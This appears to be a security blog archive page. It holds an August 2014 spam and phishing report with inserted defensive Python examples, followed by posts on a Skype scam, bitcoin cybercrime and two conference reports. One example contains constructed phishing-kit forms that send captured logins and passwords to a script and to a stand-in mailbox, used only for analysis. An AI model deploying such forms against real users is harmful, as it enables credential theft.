In August, fraudulent emails exploited global political events and the names of famous people in the Russian Federation. Malicious files were spread via email, including ones that imitated court summons. Spammers who earn money by advertising medications used popular services to attract the attention of recipients. Spammers also actively advertised travel services and collection agencies.

Malicious court summons
In August we registered several mass mailings imitating court summons in various languages. The English-language version informed the recipient that they were being taken to court and should study the case materials to prepare a defense. Those materials were supposedly in an attachment, which actually contained the Trojan Backdoor.Win32.Kuluoz, capable of downloading and running other malware on the victim's computer. By comparing several emails from a single mass mailing we confirmed that some details, such as the time, date and venue of the hearing and the names of the archives containing the malicious files, varied from email to email. The sender addresses had been generated from a single template into which the scammers simply inserted words from a pre-determined list. The variations in the text were intended to make each message look individual and to bypass spam filtering.
As well as the English-language versions, similar malicious spam appeared in Russian and Czech. The scammers tried to convince users that they had unpaid debts due within 15 days; if they didn't pay, recipients were warned, their property could be confiscated and their bank accounts frozen. The attached archive contained Trojan-Downloader.Win32.Agent.heva, a malicious file presented by the fraudsters as financial and legal documents. Once the user ran the Trojan, an RTF file was displayed as a decoy while the malicious program downloaded and installed Trojan.Win32.Tinba.ei, yet another Trojan designed to steal financial information such as bank account credentials and credit card data. The name Tinba is short for 'Tinybanker': the malware is a small piece of assembler code, but it has the functionality of many larger banking Trojans.
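The court-summons mailing above is a good illustration of how such campaigns can still be clustered even though every message differs in its hearing date, time, venue and archive name: mask the variable fields, then compare what is left. The following is an added example and is not code from the original report. It canonicalizes message bodies by replacing email addresses, file names, dates, times and bare numbers with placeholders, compares the resulting word-trigram sets with a Jaccard score, and groups messages greedily; the three sample messages are constructed for the example and the 0.7 similarity threshold is an assumption.

```python
import re

# Constructed sample messages (not real spam): two variants of one
# "court summons" mailing that differ only in the hearing date and time,
# the venue and the attachment name, plus one unrelated message.
SUMMONS_A = (
    "Notice to Appear in Court\n"
    "Hearing date: August 14, 2014 at 10:30 AM\n"
    "Court: District Court of Westminster, Room 4\n"
    "Case materials are attached: Court_Notice_284713.zip\n"
    "Failure to appear may result in a default judgment."
)
SUMMONS_B = (
    "Notice to Appear in Court\n"
    "Hearing date: August 21, 2014 at 09:00 AM\n"
    "Court: District Court of Manchester, Room 12\n"
    "Case materials are attached: Notice_Of_Appearance_91188.zip\n"
    "Failure to appear may result in a default judgment."
)
RECEIPT = (
    "Your Google Play order receipt\n"
    "Order number: GPA.1234-5678-9012\n"
    "Total: $4.99\n"
    "Thank you for shopping with Google Play."
)

# Variable fields are replaced by placeholders. Order matters: file names,
# dates and times are masked before bare digit runs so that each collapses
# to a single token instead of being masked piecemeal.
MASKS = [
    (re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"), "<EMAIL>"),
    (re.compile(r"\b[\w-]+\.(?:zip|rar|7z|exe|scr|pdf|docx?)\b", re.I), "<FILE>"),
    (re.compile(r"\b(?:Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\w*"
                r"\s+\d{1,2},?\s+\d{4}"), "<DATE>"),
    (re.compile(r"\b\d{1,2}:\d{2}(?:\s*[AP]M)?", re.I), "<TIME>"),
    (re.compile(r"\d+"), "<NUM>"),
]


def canonicalize(text):
    """Mask the per-recipient fields and normalize case and whitespace."""
    for pattern, placeholder in MASKS:
        text = pattern.sub(placeholder, text)
    return " ".join(text.lower().split())


def shingles(text, n=3):
    """Set of word n-grams of the canonical text (placeholders count as words)."""
    tokens = re.findall(r"<\w+>|\w+", canonicalize(text))
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}


def similarity(a, b, n=3):
    """Jaccard similarity of the two messages' shingle sets, in [0, 1]."""
    sa, sb = shingles(a, n), shingles(b, n)
    if not sa and not sb:
        return 1.0
    return len(sa & sb) / len(sa | sb)


def cluster(messages, threshold=0.7):
    """Greedy single-pass clustering: a message joins the first cluster whose
    representative (its first member) is at least `threshold` similar,
    otherwise it starts a new cluster. Returns lists of message indices."""
    groups = []
    for i, msg in enumerate(messages):
        for group in groups:
            if similarity(messages[group[0]], msg) >= threshold:
                group.append(i)
                break
        else:
            groups.append([i])
    return groups


if __name__ == "__main__":
    print(canonicalize(SUMMONS_A))
    print("A vs B:", round(similarity(SUMMONS_A, SUMMONS_B), 3))
    print("A vs receipt:", round(similarity(SUMMONS_A, RECEIPT), 3))
    print(cluster([SUMMONS_A, SUMMONS_B, RECEIPT]))
```

The two summons variants share all but the three trigrams around the venue name and score well above the threshold, while the unrelated receipt shares none. The same masking can be applied to the sender's local part to recover the word-list template the report describes.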
In August, we again came across "Nigerian letters" exploiting the events in Ukraine. In an email written in English the scammers used the name of the former President of Ukraine, Viktor Yanukovych, to sell their story. This time the popular "Nigerian" trick of asking for help in investing money in return for a substantial reward came from a self-described former financial adviser to the President, whose money had supposedly been secretly transferred to the adviser's personal account in London.
After a long silence the name of Mikhail Khodorkovsky was back again. We came across "Nigerian letters" supposedly written on behalf of his inner circle. To trick readers, the fraudsters spun the standard story offering a reward for assistance in transferring and investing huge sums of money. To make the email look more realistic, the body of the message contained links to official articles about Khodorkovsky. In addition, it was emphasized that all future transactions were legal and presented no risk to the victim.
One email provides minimal information, simply asking recipients to contact the scammers if they find the offer interesting. Another provides details of a tempting offer and stories from Khodorkovsky's life: before his arrest he could not withdraw all his money from Russia and now, after his release, he intends to complete the transfer. However, as the disgraced billionaire cannot use his former company to do this, he is looking for someone to help him. Interestingly, the "Nigerian" scammers allow recipients to unsubscribe from their mailing list by sending an email to the address at the end of the message. This is how the fraudsters collect a database of active email addresses for future spam mass mailings.

Medication adverts in fake Google Play emails
Spam messages advertising medications regularly offer pills to lose weight, enhance potency or improve the male sex drive. The body of these emails includes a short text with a link to the website of a store where the advertised product can be bought; sometimes there is just a link. To send out "pharmaceutical" adverts, the fraudsters often use image-based spam. However, we sometimes see quite unusual tricks used to advertise meds. For example, last autumn we wrote in our blog about a series of mailings which used the names of well-known companies and looked just like typical phishing messages. In August 2014, we noted another similar mass mailing.
This time the phishing-style email looked like a purchase notification from the Google Play app store. To convince the recipient that the email was genuine, the spammers used a realistic-looking sender address as well as the store's official logo. The links in the body text, which in mailings of this kind often lead to pages on the real website, were inactive this time, even though they were highlighted. It seems the scammers did not expect their fake notifications to get through the spam filters, so they made their emails look like classic phishing emails.

Spammers' Indian summer
The English-language segment of the Internet saw spam mass mailings offering special-offer tours to Hawaii, Costa Rica or tropical forests, as well as the chance to charter a private jet for business or pleasure. These messages came from various addresses and contained links to newly created sites where users could compare prices and select the most attractive offer.
We also noted mailings inviting recipients to participate in earn-online programs. These so-called binary options promised quick and easy income to cover all the costs of the vacations advertised elsewhere.

How (not) to repay a loan
Another common theme in August's spam was debt management for individuals and companies. Spammers sent out colorful messages with slogans like "Only pay what you can afford" and promised to wipe out crippling debts. The hyperlink in the email led to a newly created, near-empty site with a name like "Zero-debt-now" offering consolidated loans (i.e. one loan taken out to pay off several others) or favorable credit terms.
Collection agencies and private lawyers, meanwhile, offered the opposite: specialized services to collect unpaid debts without slow and costly court proceedings. The advertising emails provided a brief description of the organization's activities, the details of its work, a few statistics (the number of debts collected, the number of satisfied customers, etc.) and a contact phone number. The digits in the telephone numbers were often deliberately distorted or 'noised' to bypass spam filters. The authors of the messages promised a successful outcome even in cases where other specialized services had already failed.
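Distorted phone numbers are a reminder that a filter has to normalize before it can match a blocklisted number. The example below is added here and is not code from the report. It assumes the kinds of distortion commonly seen in such mailings (digits spelled out as words, look-alike characters such as O for 0 or l for 1, and separators pushed between digits); the report itself does not enumerate the tricks used, and the sample lines are constructed. A candidate is only reported when at least half of its characters were real digits, so ordinary words made of look-alike letters are not turned into numbers by themselves.

```python
# Look-alike characters that spammers substitute for digits, and digit words.
# Both mappings are assumptions for this example, not a list from the report.
HOMOGLYPHS = {"O": "0", "o": "0", "I": "1", "l": "1", "|": "1",
              "S": "5", "s": "5", "B": "8"}
DIGIT_WORDS = {"zero": "0", "one": "1", "two": "2", "three": "3", "four": "4",
               "five": "5", "six": "6", "seven": "7", "eight": "8", "nine": "9"}
# Characters removed from inside a token before it is interpreted.
SEPARATORS = "()[]-._/\\:+,;!?"
_STRIP = str.maketrans("", "", SEPARATORS)

# Constructed sample lines (not taken from a real mailing).
SAMPLES = [
    "Call 1 (8OO) 555-O1O0 today!",
    "Reach us at 8 0 0 . 5 5 5 . 0 1 9 9 or text NOW",
    "Dial Sl5-S55-Ol99 for a quote",
    "We collect eight zero zero 555 0199 debts fast",
    "Tracking number 1234567890123 shipped",
]


def token_digits(token):
    """Interpret one whitespace-delimited token as part of a phone number.

    Returns (digits, literal_digit_count); digits is empty for a token made
    only of separators. Returns None when the token cannot be part of a
    number because it contains a character that is neither a digit, a
    look-alike nor a separator (an ordinary word, for example)."""
    word = token.lower().strip(SEPARATORS)
    if word in DIGIT_WORDS:
        return DIGIT_WORDS[word], 0
    core = token.translate(_STRIP)
    digits, literal = [], 0
    for ch in core:
        if ch.isdigit():
            digits.append(ch)
            literal += 1
        elif ch in HOMOGLYPHS:
            digits.append(HOMOGLYPHS[ch])
        else:
            return None
    return "".join(digits), literal


def extract_phone_numbers(text, min_len=10, max_len=11, min_literal_ratio=0.5):
    """Return the normalized phone numbers hidden in `text`.

    Consecutive number-like tokens are merged into one candidate. The
    candidate is accepted when its length is plausible for a national or
    1-prefixed North American number (an assumption; adjust per region) and
    at least `min_literal_ratio` of its characters were genuine digits."""
    found = []
    digits, literal = "", 0

    def flush():
        nonlocal digits, literal
        if min_len <= len(digits) <= max_len and literal >= min_literal_ratio * len(digits):
            found.append(digits)
        digits, literal = "", 0

    for token in text.split():
        mapped = token_digits(token)
        if mapped is None:
            flush()
        else:
            digits += mapped[0]
            literal += mapped[1]
    flush()
    return found


if __name__ == "__main__":
    for line in SAMPLES:
        print(repr(line), "->", extract_phone_numbers(line))
```

The output of `extract_phone_numbers` can be compared against a list of known spam numbers, or used as a feature on its own: a message whose only phone number needed de-noising to parse is itself suspicious.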
Percentage of spam in email traffic
The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The amount of unsolicited email increased throughout the month: in early August the percentage of spam averaged 64.9%, while by the end it reached 70.4%.

Sources of spam by country
In August, the USA remained the most popular source of spam (15.9%), up 0.7 percentage points from the previous month. Russia was in second place with 6%, up 0.4 percentage points. China was in third place with 4.7%, having produced 0.6 pp less spam than in July.
Sources of spam around the world
Vietnam was in 4th position with 4.7% of all distributed spam; its contribution grew by 1.2 pp, which pushed the country up four places in the rankings. It was followed by Argentina (4.4%), which saw little change in its numbers and dropped one place in the table.
Germany (3.6%) remained in 6th place with a slight decrease in its share of distributed spam. Ukraine dropped to 8th. Meanwhile, Brazil (2.9%) added 0.5 pp to its previous month's contribution and placed 9th in August's Top 10, which was rounded off by India (2.8%).
Of note is the slight growth of spammer activity in South Korea (1.9%), which entered the Top 20 in August.

Malicious attachments in email
The graphic below shows the Top 10 malicious programs spread by email in August.
The Top 10 malicious programs spread by email
In August Trojan.JS.Redirector.adf topped the rating of malicious programs most often spread via email. Its name speaks for itself: it is an HTML page containing JavaScript that redirects users to a scammer site offering downloads of Binbot, a popular service for automated online trading of binary options. This malicious program is distributed via email in a ZIP archive that is not password-protected.
Trojan-Downloader.Win32.Upatre.to and Trojan-Downloader.Win32.Upatre.tq were in 3rd and 6th places. These malicious programs are relatively simple, no more than around 3.5 KB in size, and usually download a banking Trojan from the family known as Dyre/Dyzap/Dyreza. The list of financial organizations targeted by this banker depends on the configuration file, which is downloaded from the command-and-control server.
Trojan-Banker.Win32.Fibbit.rq was fourth. This banking Trojan hooks into Java applications used for online banking, targeting authentication data and other information such as keys, substituted transactions and their results.
Backdoor.Win32.Androm.enji and Backdoor.Win32.Androm.erom were fifth and ninth in the ranking. Both malicious programs belong to Andromeda/Gamarue, a universal modular bot whose features include downloading, storing and running executable files, loading DLLs (without saving them to disk) and plugins, as well as the ability to self-update and self-delete. The functionality of the bot can be expanded using a system of plugins that the criminals load as required.
Trojan.Win32.Bublik.clhs and Trojan.Win32.Bublik.bwbx, modifications of the notorious Bublik malware, took 7th and 8th positions in August. The Bublik malware family is mostly used for the unauthorized download and installation of new versions of malware onto victim computers.
Trojan-Spy.Win32.LssLogger.bos rounded off the Top 10. It is a multifunctional malicious program capable of stealing passwords from a wide range of software. All stolen information is then sent to the fraudsters via email.
Distribution of email antivirus detections by country
In August, the UK took the lead with 13.16% of all antivirus detections (+6.26 percentage points). Germany (9.58%, -1.49 percentage points) and the USA (7.69%, -1.59 percentage points) were 2nd and 3rd respectively.
The most unexpected result arrived from Russia: its share grew by 3.33 pp from July and accounted for 6.73% which moved this country from 8th to 4th position in the ranking.
Italy (3.31%) dropped from 5th to 8th place having lost 1.33 percentage points. Hong Kong outran Australia, Turkey and Vietnam with 2.74% of all antivirus detections (+0.28 percentage points).

Special features of malicious spam
In August, the scammers again used fake notifications from Facebook to distribute malicious attachments. This time, users received a message from an unknown address warning them of the possible deactivation of their accounts. According to the text, over the last few days (in some emails, months) the social network had been attacked by hackers. To avoid any problems, the 'developers' asked users to install the utility attached to the email.
Each email contained a password-protected ZIP archive with an executable file, and a unique password needed to unpack it. The attached archive bore the name of the user to whom the email was addressed (the login part of their email address), and the same name was used to generate the password for the archive. At the end of the email the scammers said that the file could only be opened on a PC running a Microsoft operating system. The utility in the archive was in fact a Trojan downloader belonging to the Trojan-Downloader.Win32.Haze family. This malware downloads other malicious software, usually developed to steal the owner's personal data or to send infected emails to the addresses in the victim's contact list.

Phishing
In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. This considerable growth was probably caused by the summer slowdown in the demand for advertising spam. Fraudsters who do not want to lose their earnings switch to mass phishing mailings.
Australia topped the rating of countries most often attacked by phishers: during the month the number of Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. Brazil was 2nd with 19.5% of attacked users. It was followed by the UK (15.2%), Canada (14.6%) and India (14.5%).
The geography of phishing attacks*, August 2014
* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users
Top 10 countries by the percentage of attacked users:

    Country              % of users
 1  Australia            24.4
 2  Brazil               19.5
 3  UK                   15.2
 4  Canada               14.6
 5  India                14.5
 6  UAE                  14.1
 7  Ecuador              13.1
 8  Dominican Republic   13.0
 9  Austria              12.8
10  China                12.7

Targets of attacks by organization
The statistics on phishing targets are based on detections made by Kaspersky Lab's anti-phishing component. It is activated every time a user opens a phishing page that has not previously been included in Kaspersky Lab databases. It does not matter how the user reaches this page: by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, the user sees a banner in the browser warning of a potential threat.
In August, there was little change among the organizations most often attacked by phishers. Global Internet Portals remained the leading category with 30.8%; its share increased by 1.3 pp. Social networks came second with 17.3%, a 3.3 pp decline from the previous month. These two categories accounted for more than half of all phishing attacks in August.
Organizations most frequently targeted by phishers, by category – August 2014
Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. The percentage of detections affecting Banks, Online stores and E-payment systems went down 4.9, 1.2 and 0.6 pp respectively.

Top 3 organizations most frequently targeted by phishers

    Organization   % detections
 1  Google         12.61%
 2  Facebook       10.05%
 3  Yahoo!          6.38%

In August, Google services were most heavily targeted by phishing links: their share was up 1 pp and accounted for 12.61% of all Anti-Phishing component detections. Second was Facebook, traditionally the most popular phishing target; its contribution increased by 0.4 pp. It was followed by Yahoo! (6.38%). By comparison, in July third position was occupied by Windows Live.
In August's spam traffic we came across several phishing mailings targeting logins and passwords for Yahoo! services. The emails claimed that the Yahoo! administration had registered attempts to access the user's account from an unidentified device; this activity was suspicious, and the account would be blocked if the recipient did not confirm the username and password on a special page. The body of the email contained two links for verification of personal data: the first to confirm the password and prevent blocking, the second to protect the account in case the login had been performed by someone else. Both links had the same address and led to the same phishing page. The text of the messages in different mass mailings remained almost unchanged, and the design of the emails used the Yahoo! logo.
The phishing page in one mass mailing was an exact copy of the official registration page, but in the other mailing a different background was used.
A look at the HTML code of the phishing pages shows that in the first case the victim's data was sent to a PHP script on the fraudsters' server, while in the second case it was forwarded to an email address registered on a free email service. The HTML code also specified the address to be entered in the 'From' field as well as the subject of the email, which enabled the fraudsters to identify which mass mailing each batch of stolen usernames and passwords came from.
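The two pages differ only in where the form submits, which is the first thing to pull out of a captured phishing kit. The following is an added example, not code from the report or the kits it describes: it parses the forms on a page with Python's standard HTML parser and reports, for each one, whether credentials go to an HTTP endpoint or straight to a mailbox, along with the subject and From address the page embeds. The two page fragments are constructed; the hidden-field names `subject` and `from` and the credential-field name heuristic are assumptions of the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote, urljoin

# Field names that usually carry the credentials a phishing form captures
# (heuristic; an assumption of this example).
CREDENTIAL_FIELD = re.compile(r"user|login|email|mail|pass|pwd", re.I)

# Constructed phishing-kit fragments (not the pages from the report):
# KIT_A posts the form to a PHP script on the phishing host, KIT_B submits it
# straight to a mailbox via a mailto: action, carrying the subject in the
# action URL and the From address in a hidden field.
KIT_A = """
<form method="post" action="login.php">
  <input type="text" name="login">
  <input type="password" name="passwd">
  <input type="hidden" name="src" value="ym">
  <input type="submit" value="Sign in">
</form>
"""
KIT_B = """
<form method="post" enctype="text/plain"
      action="mailto:drop.box.2014@example.com?subject=Yahoo%20mailing%2002">
  <input type="text" name="login">
  <input type="password" name="passwd">
  <input type="hidden" name="from" value="verify@example.com">
  <input type="submit" value="Verify">
</form>
"""


class FormCollector(HTMLParser):
    """Collect every <form> with its action, method, visible field names and
    hidden fields (name -> value)."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(),
                          "fields": [], "hidden": {}}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None and a.get("name"):
            kind = (a.get("type") or "text").lower()
            if kind == "hidden":
                self._form["hidden"][a["name"]] = a.get("value") or ""
            elif kind != "submit":
                self._form["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def exfil_targets(html, page_url):
    """Describe where each form on a phishing page sends what it collects."""
    parser = FormCollector()
    parser.feed(html)
    report = []
    for form in parser.forms:
        action = form["action"]
        captured = [f for f in form["fields"] if CREDENTIAL_FIELD.search(f)]
        if action.lower().startswith("mailto:"):
            address, _, query = action[len("mailto:"):].partition("?")
            params = {k: v[0] for k, v in parse_qs(query).items()}
            report.append({
                "channel": "email",
                "destination": unquote(address),
                "subject": params.get("subject") or form["hidden"].get("subject"),
                "sender": form["hidden"].get("from"),
                "captured": captured,
            })
        else:
            # Relative actions resolve against the page's own URL.
            report.append({
                "channel": "http",
                "destination": urljoin(page_url, action),
                "method": form["method"],
                "captured": captured,
            })
    return report


if __name__ == "__main__":
    for kit in (KIT_A, KIT_B):
        for entry in exfil_targets(kit, "https://example.invalid/verify/index.html"):
            print(entry)
```

The mailbox address, subject tag and From address recovered from a mailto-style kit are exactly the values that let the fraudsters sort incoming credentials by mailing, so they are also the most useful pivots when correlating kits from different campaigns.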
The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The rating of the most popular sources of spam remained unchanged from July: the USA (15.9%), Russia (6%) and China (4.7%).
In August, scammers continued to spread "Nigerian letters" calling for help in the fall-out from the crisis in Ukraine. English-language emails supposedly written on behalf of an associate of the former Ukrainian president Viktor Yanukovych asked for assistance in investing money. Mikhail Khodorkovsky's on-going story was yet another pretext used by scammers to extract money from victims.
Malicious emails imitating court summons were often seen in August's spam traffic. These messages were written in different languages and the attached malicious files were developed both to steal personal information and to extort money for decrypting files on the victims' computers.
To advertise pharmaceutical spam, scammers used fake notifications from the online Google Play store. The links in them led to pages advertising popular medications.
In August, spammers actively promoted the services of travel and debt collection agencies.
August's list of most widely-distributed malware was topped by Trojan.JS.Redirector.adf. The long-term leader Trojan-Spy.HTML.Fraud.gen maintained 2nd position in the rating.
In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections, which is 12,495,895 detections more than in the previous month. Australia was the country most often attacked by phishers: during the month the number of Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. The Global Internet Portals category remained the sector most frequently targeted by phishers (30.8%). Financial phishing accounted for 35.2% of all attacks, a 6.6 pp drop compared with the previous month. Yahoo! entered the Top 3 organizations most frequently targeted by phishers.
It used to be a common scam: Russian cybercriminals would send an SMS like: "Mom, I'm in trouble. Please, transfer me some funds. I will explain it properly when I get home". A whole bunch of friends and relatives got suckered by this fraud, believing that the message had genuinely come from someone close to them.
Fortunately, Russian mobile operators cracked down hard on this, forcing the criminals to give up. But now they've moved on to Skype. Yesterday I got this Skype message from one of my contacts:
Translation of the text:
Hey. I'm on a trip right now and I can't get to a payment terminal and top up my balance. Could you please transfer 100 rubles, or even better 200, to the number +7925XXXXXXX? I can't think of anyone else who could help me. It would really do me a big favor! I'll pay you back as soon as I get home!!
What happened? The cybercriminals stole my contact's password, probably using password stealing malware. Suddenly, even a Skype account without any money attached is worth something to a crook.
The victim will never see that couple of hundred rubles again. The number mentioned belongs to the cybercriminals, not to the Skype account-holder. It's impossible to say how many people fall victim to this kind of social engineering fraud, but in general we know that social engineering is an effective trick for scammers.
An interesting title felt just about right for an interesting topic when I first submitted my research paper about the evolution of bitcoin cybercrime for this year's edition of the Virus Bulletin conference, held in sleepless Seattle. Discussing the situation from an economic standpoint, I aimed to paint a picture reflecting how the present geopolitical situation in Latin America makes the region a fertile ground for bitcoin enthusiasts and, by extension, cybercriminals. It's certainly not easy to capture a snapshot of a phenomenon that changes so rapidly and present it to a group of security experts who are already well informed about the subject. Nevertheless, with the aid of regional statistics, incident timelines and analysis of the most interesting malware samples, there is enough information in the report to give some clear indicators about what's been going on with the world's most popular cryptocurrency this past year, and what we can expect in the future when it comes to bitcoin-related cybercrime.
While some early adopters have been involved in the bitcoin market from the beginning (by means of mining or simply by participating in exchanges), others are just grasping the concept of cryptocurrencies and learning about the perils of bitcoin the hard way – be it in the form of ransomware demanding a quick payment or malicious mining code consuming their limited computing resources. From wallet stealing malware to large scale bitcoin exchange heists, we can find just about anything in the cryptoworld, and this is just the beginning. Nowadays, we talk about malware and cybercrime as two sides of the same (bit)coin, usually referring to organized crews of criminals with clearly defined roles engaging in illegal activities with the sole purpose of financial profit. It makes sense then, to observe the correlation between the number of malware samples in the wild targeting bitcoin users and the price of the currency being exchanged on global markets.
As mentioned in 2013's Kaspersky's Security Bulletin, our predictions for the cybercriminal bitcoin ecosystem came true – and then some: "Attacks on Bitcoin pools, exchanges and Bitcoin users will become one of the most high-profile topics of the year. Attacks on stock exchanges will be especially popular with the fraudsters as their cost-to-income ratio is very favorable.
As for Bitcoin users, in 2014 we expect considerable growth in the number of attacks targeting their wallets. Previously, criminals infected victim computers and went on to use them for mining. However, this method is now far less effective than before while the theft of Bitcoins promises cybercriminals huge profits and complete anonymity."
It's a long time since we got through a week without one of the major bitcoin exchanges making headline news. We can attribute the success of some attacks to faulty technical implementations of bitcoin wallets, others relied on clever social engineering approaches, and the rest can be blamed on bad business practices and simple negligence about adhering to already proven security standards. There are just too many incidents to list, but there is a common thread uniting them all, which makes them a great body of experience for future generations of bitcoin exchanges to build on.
We have only recently seen why countries like Argentina and Brazil have become fertile ground for the adoption of a cryptocurrency economy, and as we have realized this, so too have cybercriminals. With a whole new set of frauds, scams and threats facing bitcoin holders, citizens need to be aware that keeping their savings secure is no easy task in today's hyper-connected world. Because there are no borders for cryptocurrencies, there are none for criminals either, and following the money trail means landing in Latin America, where the general public is still widely vulnerable to many attacks seen in other parts of the world.
After the Mt. Gox incident we have witnessed targeted phishing campaigns, bitcoin community members moonlighting as private investigators, localized ransomware samples, scams, mobile miners, internet of things devices participating in botnets, and everything else that this digital bitcoin gold rush has brought upon us.
Alchemy proved possible for cryptocurrency enthusiasts, turning energy into capital, betting on the success and global adoption of their favorite choice. Seen by outsiders as a hobby for geeks, bitcoin is more than a currency, it's a community that has certain values ingrained and it's revolutionizing the financial world as we currently know it.
Collective but anonymous, organized yet decentralized, this ordered chaos is beginning to make sense after all the problems it has faced. The culling of the excess exchanges that used to be available brings a Darwinian equilibrium to the bitcoin ecosystem, forcing the ones left to implement better business practices and security measures.
Malware trends indicate that cybercriminals are migrating from mining botnets and pools to more direct wallet stealing and exchange credential hijacks. The inefficient mining Trojans working on mobile devices proved that accessing the funds stored in the victim's digital wallet can be much more straightforward than putting the effort into building a massive network of miners that reap minimal gains.
Debit Cards linked to bitcoin wallets are starting to appear and this brings another enticing entry point for criminals. With "bitwashing" services becoming more common, tracking stolen funds will prove much more difficult in the future, exposing the true anonymous nature of cryptocurrencies.
Once the de-facto choice for drug dealers and illegal markets, bitcoin is aiming to gain the global trust of other merchants, hoping that it will have a ready-made community to support it when it becomes the default standard for online and offline transactions. You can read the full paper presented at Virus Bulletin here.
What, Where & When: The 0x07th edition of SEC-T, an annual Stockholm-based conference, was held on 18-19 September at the stunning Anrika Nalen venue, just a 15 minute walk from the famous Gamla Stan.
This conference features only one track of presentations, which, in my opinion, is quite a good thing, because you don't have to make any difficult choices. This year, besides the regular full-length presentations, the agenda included a couple of 30-minute "small talks" as well as a bunch of lightning talks of 10-20 minutes each.
The conference kicked off with an excellent speech given by the founder of Recurity Labs, Felix "FX" Lindner, who has proven that an opening keynote doesn't necessarily have to be boring. After lunch, Andreas Lindh presented some really cool attacks on broadband modems, including DNS poisoning and attacks that exploit CSRF vulnerabilities to send or manipulate SMS messages. This was certainly one of my favourite talks, together with the really scary presentation given by Hugo Teso on aviation security. It's terrifying how easily an experienced hacker can exploit aviation protocols and avionics systems to change the on-board system configuration, including changes to the flight path!
Amongst other talks, Meredith L. Patterson highlighted some pressing issues concerning the APIs of popular software, but, apparently, not everybody agrees with her highly-critical point of view. At the beginning of the second day, my colleague, David Jacoby, gave an entertaining presentation on how he hacked his home, including successful attacks on his NAS storage, ISP provided router, smart TV and other devices he found connected to the Internet.
Last, but not least, there were also some short but interesting lightning talks from a number of speakers (including myself :)) on topics such as URL parsing, hard drive cryptography and breaking out of the AngularJS sandbox. I did a short presentation about my background research on the current threat landscape for SOHO devices, which turned out to be quite in line with the conference's theme, featuring research on vulnerabilities in the so-called Internet-of-Things.
In conclusion, this was a really nice conference, profiting from its one-track only schedule, very high-quality presentations and unique atmosphere. Congrats to the whole SEC-T crew – really good job, guys! And see you all next year!
What, Where & When: the 4th edition of 44CON, an annual IT security conference organized by Sense/Net Ltd, took place on 10-12 September in London, at a venue near the Earl's Court exhibition centre. Geeks who happened to enjoy somewhat spooky historical monuments could take a five-minute walk from the venue to visit an old and impressive cemetery, one of London's Magnificent Seven.
The Schedule this year was packed with three tracks of (mostly) one-hour presentations on a wide range of topics: from social engineering to exploitation techniques, from crypto-currencies to IoT-related threats and GSM hacking. Some amazing workshops were running simultaneously in rooms bearing the familiar names AES, 2DES and Blowfish.
This year's Badge is not only extremely handsome but may also turn out to be very handy, at least for hardware-oriented researchers, as it happens to be a BusBlaster v3 board specially customized for 44CON (you can find the full specification here). This small, cute thing can be used to program and debug embedded ARM devices.
With so many things going on simultaneously, it was impossible to attend even a third of them. Moreover, the online schedule didn't include descriptions of the talks, so in some cases choosing the right track in advance was a bit of a lottery. Nevertheless, the overall quality of the presentations was so high that no matter which talks you chose, you always ended up with some new, valuable information.
From the selection of very good talks I attended, here are my favourite ones:
- "Researching Android devices security with the help of a droid army", by Joshua J. Drake (@jduck) in which – in a quite entertaining way – Joshua explained how and why he built his research lab, capable of testing 40+ Android devices at the same time. I was really impressed by the framework Joshua invented for managing his "droid army".
- "I hunt TR-069 Admins: pwning ISPs like a boss", by Shahar Tal (@jifa). This talk was especially interesting to me, as I'm currently involved in researching threats to small network devices such as residential gateways (aka SOHO routers), a fair share of which use the TR-069 protocol to talk to the ISP's Auto Configuration Servers. It turns out (not really surprisingly, if you ask me) that this protocol is poorly secured and highly vulnerable, and might be exploited in a way that could affect a whole set of devices at once. And the worst thing about it is that the average user can't do much to improve the security of their network, even if they have sufficient knowledge. Most of the responsibility lies with the service providers, together with the hardware vendors, who don't seem concerned enough about security issues...
- "On Her Majesty's Secret Service: GRX and Spy Agency", by Stephen Kho and Rob Kuiters. This intriguing talk on how and why GCHQ hacked the Belgian GRX provider was given by experts from the KPN CISO team and concluded the 2nd day of the conference. The first part of the talk was a technical description of GRX, its functionality and weaknesses, and the kind of information that can be leaked; in the second part the speakers presented the results of the "extensive network scanning" that they had conducted over the last several months. It's really scary that there are a lot of devices running vulnerable and *terribly* outdated software on GRX networks.
The Networking was made easier with Gin O'Clock, a one-hour break in the afternoon schedule (on both conference days) dedicated to human interaction and socializing in the intimate atmosphere of the conference bar. A traditional red double-decker bus was there to serve British ale, cider and Pimm's; every attendee was also offered a free glass of gin and tonic.
Some of The Materials have already been published and they are available at Slideshare.
Overall, The Experience was really great and we are looking forward to attending the next 44CON in 2015!